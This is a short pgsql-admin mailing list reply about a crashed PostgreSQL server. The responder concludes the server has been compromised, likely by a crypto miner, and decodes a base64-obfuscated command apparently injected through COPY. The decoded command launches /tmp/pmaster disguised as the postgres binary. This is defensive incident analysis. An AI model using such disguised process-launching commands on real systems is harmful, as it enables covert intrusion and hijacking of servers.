Re: Postgresql db crash and recovery mode

От Julien Rouhaud
Тема Re: Postgresql db crash and recovery mode
Дата
Список pgsql-admin
On Tue, Oct 5, 2021 at 10:58 PM Tom Lane <tgl@sss.pgh.pa.us> wrote:

> =?UTF-8?B?TGF0aWYgZ8O8ZMO8aw==?= <latifguduk@gmail.com> writes:
> > One of our production database crashed and got FATAL:  the database system
> > is in recovery mode. You can find OS version and db version info below.
>
> > 2021-10-05 17:01:08.103 +03     20248  LOG:  server process (PID 158856)
> > was terminated by signal 9: Killed
>
> That is an external kill.  If you didn't do it manually, it's most likely
> the Linux OOM killer in action.

The really worrying part is that it looks like your server has been
compromised and you should do something about it, unless you want to
keep mining bitcoins for strangers (or worse).  I'm assuming that
you're trying to start postgres using obfuscation in COPY command:

$ echo
cHl0aG9uIC1jICdpbXBvcnQgc3VicHJvY2VzczsgcHJvYyA9IHN1YnByb2Nlc3MuUG9wZW4oWyIvdXNyL3Bnc3FsLTExL2Jpbi9wb3N0Z3JlcyJdLCBleGVjdXRhYmxlPSIvdG1wL3BtYXN0ZXIiKS53YWl0KCknCg==
| base64 -d

python -c 'import subprocess; proc =
subprocess.Popen(["/usr/pgsql-11/bin/postgres"],
executable="/tmp/pmaster").wait()'